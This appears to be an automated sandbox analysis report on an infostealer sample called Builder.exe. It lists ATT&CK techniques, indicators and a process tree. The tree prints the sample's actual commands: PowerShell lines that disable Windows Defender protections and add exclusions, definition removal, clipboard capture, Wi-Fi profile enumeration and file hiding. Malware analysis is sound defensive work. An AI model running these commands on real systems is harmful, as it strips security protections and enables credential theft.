9945e87a1ca542897f02db85a4503a3d5b65de54b08be720d096c62d25e4357d

Resubmissions

17-01-2025 22:44

250117-2nsgkavpcw 10

16-01-2025 02:54

250116-ddxrjazjgl 10

Analysis

max time kernel
175s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-01-2025 22:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Builder.exe
Size

6.0MB
MD5

6e82d5096ecc9edf1ecf2260b561f957
SHA1

bd9dc15e9f28c4210306ac3a12ad55ed2bf4f939
SHA256

9945e87a1ca542897f02db85a4503a3d5b65de54b08be720d096c62d25e4357d
SHA512

dc155597afa523f128b7e7fecd37b01005e4b32477a4137786f7772b81d06d6330a2214ac0274f7e1acd4f827e0b56ff026df01577299e446dca275d46c60765
SSDEEP

98304:LaEtdFBCm/I5xamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RGOnAKt7M0Cu:LhFIm/NeN/FJMIDJf0gsAGK4RVnAKtIE

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1496	powershell.exe
1232	powershell.exe
1512	powershell.exe
4352	powershell.exe
3520	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3528	cmd.exe
5060	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1776	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe
2740	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2496	tasklist.exe
1884	tasklist.exe
3620	tasklist.exe
780	tasklist.exe
2860	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3144	cmd.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023cc5-21.dat	upx
behavioral1/memory/2740-25-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp	upx
behavioral1/files/0x0007000000023cb8-27.dat	upx
behavioral1/files/0x0007000000023cc3-31.dat	upx
behavioral1/memory/2740-48-0x00007FFBFE9D0000-0x00007FFBFE9DF000-memory.dmp	upx
behavioral1/files/0x0007000000023cbf-47.dat	upx
behavioral1/files/0x0007000000023cbe-46.dat	upx
behavioral1/files/0x0007000000023cbd-45.dat	upx
behavioral1/files/0x0007000000023cbc-44.dat	upx
behavioral1/files/0x0007000000023cbb-43.dat	upx
behavioral1/files/0x0007000000023cba-42.dat	upx
behavioral1/files/0x0007000000023cb9-41.dat	upx
behavioral1/files/0x0007000000023cb7-40.dat	upx
behavioral1/files/0x0007000000023cca-39.dat	upx
behavioral1/files/0x0007000000023cc9-38.dat	upx
behavioral1/files/0x0007000000023cc8-37.dat	upx
behavioral1/files/0x0007000000023cc4-34.dat	upx
behavioral1/files/0x0007000000023cc2-33.dat	upx
behavioral1/memory/2740-30-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp	upx
behavioral1/memory/2740-56-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp	upx
behavioral1/memory/2740-55-0x00007FFBF78F0000-0x00007FFBF791D000-memory.dmp	upx
behavioral1/memory/2740-58-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp	upx
behavioral1/memory/2740-60-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp	upx
behavioral1/memory/2740-62-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp	upx
behavioral1/memory/2740-64-0x00007FFBFCBF0000-0x00007FFBFCBFD000-memory.dmp	upx
behavioral1/memory/2740-66-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp	upx
behavioral1/memory/2740-73-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp	upx
behavioral1/memory/2740-74-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp	upx
behavioral1/memory/2740-71-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp	upx
behavioral1/memory/2740-70-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp	upx
behavioral1/memory/2740-76-0x00007FFBF8FA0000-0x00007FFBF8FB4000-memory.dmp	upx
behavioral1/memory/2740-78-0x00007FFBF8900000-0x00007FFBF890D000-memory.dmp	upx
behavioral1/memory/2740-80-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp	upx
behavioral1/memory/2740-81-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp	upx
behavioral1/memory/2740-82-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp	upx
behavioral1/memory/2740-95-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp	upx
behavioral1/memory/2740-97-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp	upx
behavioral1/memory/2740-125-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp	upx
behavioral1/memory/2740-205-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp	upx
behavioral1/memory/2740-216-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp	upx
behavioral1/memory/2740-303-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp	upx
behavioral1/memory/2740-323-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp	upx
behavioral1/memory/2740-326-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp	upx
behavioral1/memory/2740-317-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp	upx
behavioral1/memory/2740-322-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp	upx
behavioral1/memory/2740-318-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp	upx
behavioral1/memory/2740-684-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp	upx
behavioral1/memory/2740-725-0x00007FFBF8FA0000-0x00007FFBF8FB4000-memory.dmp	upx
behavioral1/memory/2740-724-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp	upx
behavioral1/memory/2740-723-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp	upx
behavioral1/memory/2740-722-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp	upx
behavioral1/memory/2740-711-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp	upx
behavioral1/memory/2740-721-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp	upx
behavioral1/memory/2740-720-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp	upx
behavioral1/memory/2740-719-0x00007FFBF78F0000-0x00007FFBF791D000-memory.dmp	upx
behavioral1/memory/2740-718-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp	upx
behavioral1/memory/2740-717-0x00007FFBFE9D0000-0x00007FFBFE9DF000-memory.dmp	upx
behavioral1/memory/2740-716-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp	upx
behavioral1/memory/2740-715-0x00007FFBFCBF0000-0x00007FFBFCBFD000-memory.dmp	upx
behavioral1/memory/2740-714-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp	upx
behavioral1/memory/2740-713-0x00007FFBF8900000-0x00007FFBF890D000-memory.dmp	upx
behavioral1/memory/2740-700-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5408	cmd.exe
5572	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2952	cmd.exe
4808	netsh.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2100	WMIC.exe
2904	WMIC.exe
464	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
940	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5572	PING.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1232	powershell.exe
1232	powershell.exe
1512	powershell.exe
1512	powershell.exe
1496	powershell.exe
1496	powershell.exe
5060	powershell.exe
5060	powershell.exe
2452	powershell.exe
2452	powershell.exe
5060	powershell.exe
2452	powershell.exe
4352	powershell.exe
4352	powershell.exe
4352	powershell.exe
1836	powershell.exe
1836	powershell.exe
3520	powershell.exe
3520	powershell.exe
3308	powershell.exe
3308	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	1884	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3408	WMIC.exe
Token: SeSecurityPrivilege	3408	WMIC.exe
Token: SeTakeOwnershipPrivilege	3408	WMIC.exe
Token: SeLoadDriverPrivilege	3408	WMIC.exe
Token: SeSystemProfilePrivilege	3408	WMIC.exe
Token: SeSystemtimePrivilege	3408	WMIC.exe
Token: SeProfSingleProcessPrivilege	3408	WMIC.exe
Token: SeIncBasePriorityPrivilege	3408	WMIC.exe
Token: SeCreatePagefilePrivilege	3408	WMIC.exe
Token: SeBackupPrivilege	3408	WMIC.exe
Token: SeRestorePrivilege	3408	WMIC.exe
Token: SeShutdownPrivilege	3408	WMIC.exe
Token: SeDebugPrivilege	3408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3408	WMIC.exe
Token: SeRemoteShutdownPrivilege	3408	WMIC.exe
Token: SeUndockPrivilege	3408	WMIC.exe
Token: SeManageVolumePrivilege	3408	WMIC.exe
Token: 33	3408	WMIC.exe
Token: 34	3408	WMIC.exe
Token: 35	3408	WMIC.exe
Token: 36	3408	WMIC.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3408	WMIC.exe
Token: SeSecurityPrivilege	3408	WMIC.exe
Token: SeTakeOwnershipPrivilege	3408	WMIC.exe
Token: SeLoadDriverPrivilege	3408	WMIC.exe
Token: SeSystemProfilePrivilege	3408	WMIC.exe
Token: SeSystemtimePrivilege	3408	WMIC.exe
Token: SeProfSingleProcessPrivilege	3408	WMIC.exe
Token: SeIncBasePriorityPrivilege	3408	WMIC.exe
Token: SeCreatePagefilePrivilege	3408	WMIC.exe
Token: SeBackupPrivilege	3408	WMIC.exe
Token: SeRestorePrivilege	3408	WMIC.exe
Token: SeShutdownPrivilege	3408	WMIC.exe
Token: SeDebugPrivilege	3408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3408	WMIC.exe
Token: SeRemoteShutdownPrivilege	3408	WMIC.exe
Token: SeUndockPrivilege	3408	WMIC.exe
Token: SeManageVolumePrivilege	3408	WMIC.exe
Token: 33	3408	WMIC.exe
Token: 34	3408	WMIC.exe
Token: 35	3408	WMIC.exe
Token: 36	3408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2100	WMIC.exe
Token: SeSecurityPrivilege	2100	WMIC.exe
Token: SeTakeOwnershipPrivilege	2100	WMIC.exe
Token: SeLoadDriverPrivilege	2100	WMIC.exe
Token: SeSystemProfilePrivilege	2100	WMIC.exe
Token: SeSystemtimePrivilege	2100	WMIC.exe
Token: SeProfSingleProcessPrivilege	2100	WMIC.exe
Token: SeIncBasePriorityPrivilege	2100	WMIC.exe
Token: SeCreatePagefilePrivilege	2100	WMIC.exe
Token: SeBackupPrivilege	2100	WMIC.exe
Token: SeRestorePrivilege	2100	WMIC.exe
Token: SeShutdownPrivilege	2100	WMIC.exe
Token: SeDebugPrivilege	2100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2100	WMIC.exe
Token: SeRemoteShutdownPrivilege	2100	WMIC.exe
Token: SeUndockPrivilege	2100	WMIC.exe
Token: SeManageVolumePrivilege	2100	WMIC.exe
Token: 33	2100	WMIC.exe
Token: 34	2100	WMIC.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe
3972	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3972	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4500 wrote to memory of 2740	4500	Builder.exe	84
PID 4500 wrote to memory of 2740	4500	Builder.exe	84
PID 2740 wrote to memory of 2496	2740	Builder.exe	85
PID 2740 wrote to memory of 2496	2740	Builder.exe	85
PID 2740 wrote to memory of 4688	2740	Builder.exe	86
PID 2740 wrote to memory of 4688	2740	Builder.exe	86
PID 2740 wrote to memory of 3028	2740	Builder.exe	87
PID 2740 wrote to memory of 3028	2740	Builder.exe	87
PID 2740 wrote to memory of 3500	2740	Builder.exe	91
PID 2740 wrote to memory of 3500	2740	Builder.exe	91
PID 2496 wrote to memory of 1232	2496	cmd.exe	93
PID 2496 wrote to memory of 1232	2496	cmd.exe	93
PID 3028 wrote to memory of 1884	3028	cmd.exe	94
PID 3028 wrote to memory of 1884	3028	cmd.exe	94
PID 4688 wrote to memory of 1512	4688	cmd.exe	95
PID 4688 wrote to memory of 1512	4688	cmd.exe	95
PID 3500 wrote to memory of 3408	3500	cmd.exe	96
PID 3500 wrote to memory of 3408	3500	cmd.exe	96
PID 2740 wrote to memory of 1256	2740	Builder.exe	98
PID 2740 wrote to memory of 1256	2740	Builder.exe	98
PID 1256 wrote to memory of 3520	1256	cmd.exe	100
PID 1256 wrote to memory of 3520	1256	cmd.exe	100
PID 2740 wrote to memory of 548	2740	Builder.exe	101
PID 2740 wrote to memory of 548	2740	Builder.exe	101
PID 548 wrote to memory of 1940	548	cmd.exe	103
PID 548 wrote to memory of 1940	548	cmd.exe	103
PID 2740 wrote to memory of 3228	2740	Builder.exe	148
PID 2740 wrote to memory of 3228	2740	Builder.exe	148
PID 3228 wrote to memory of 2100	3228	cmd.exe	173
PID 3228 wrote to memory of 2100	3228	cmd.exe	173
PID 2740 wrote to memory of 836	2740	Builder.exe	107
PID 2740 wrote to memory of 836	2740	Builder.exe	107
PID 836 wrote to memory of 2904	836	cmd.exe	109
PID 836 wrote to memory of 2904	836	cmd.exe	109
PID 2740 wrote to memory of 3144	2740	Builder.exe	110
PID 2740 wrote to memory of 3144	2740	Builder.exe	110
PID 2740 wrote to memory of 4548	2740	Builder.exe	187
PID 2740 wrote to memory of 4548	2740	Builder.exe	187
PID 4548 wrote to memory of 1496	4548	cmd.exe	114
PID 4548 wrote to memory of 1496	4548	cmd.exe	114
PID 3144 wrote to memory of 1008	3144	cmd.exe	115
PID 3144 wrote to memory of 1008	3144	cmd.exe	115
PID 2740 wrote to memory of 1056	2740	Builder.exe	117
PID 2740 wrote to memory of 1056	2740	Builder.exe	117
PID 2740 wrote to memory of 4752	2740	Builder.exe	116
PID 2740 wrote to memory of 4752	2740	Builder.exe	116
PID 1056 wrote to memory of 3620	1056	cmd.exe	120
PID 1056 wrote to memory of 3620	1056	cmd.exe	120
PID 2740 wrote to memory of 4600	2740	Builder.exe	121
PID 2740 wrote to memory of 4600	2740	Builder.exe	121
PID 4752 wrote to memory of 780	4752	cmd.exe	123
PID 4752 wrote to memory of 780	4752	cmd.exe	123
PID 4600 wrote to memory of 4452	4600	cmd.exe	124
PID 4600 wrote to memory of 4452	4600	cmd.exe	124
PID 2740 wrote to memory of 3528	2740	Builder.exe	125
PID 2740 wrote to memory of 3528	2740	Builder.exe	125
PID 2740 wrote to memory of 3632	2740	Builder.exe	126
PID 2740 wrote to memory of 3632	2740	Builder.exe	126
PID 2740 wrote to memory of 2840	2740	Builder.exe	128
PID 2740 wrote to memory of 2840	2740	Builder.exe	128
PID 2740 wrote to memory of 2952	2740	Builder.exe	131
PID 2740 wrote to memory of 2952	2740	Builder.exe	131
PID 2740 wrote to memory of 3504	2740	Builder.exe	132
PID 2740 wrote to memory of 3504	2740	Builder.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1720	attrib.exe
220	attrib.exe
1008	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4500
- C:\Users\Admin\AppData\Local\Temp\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1256
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2952
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3504
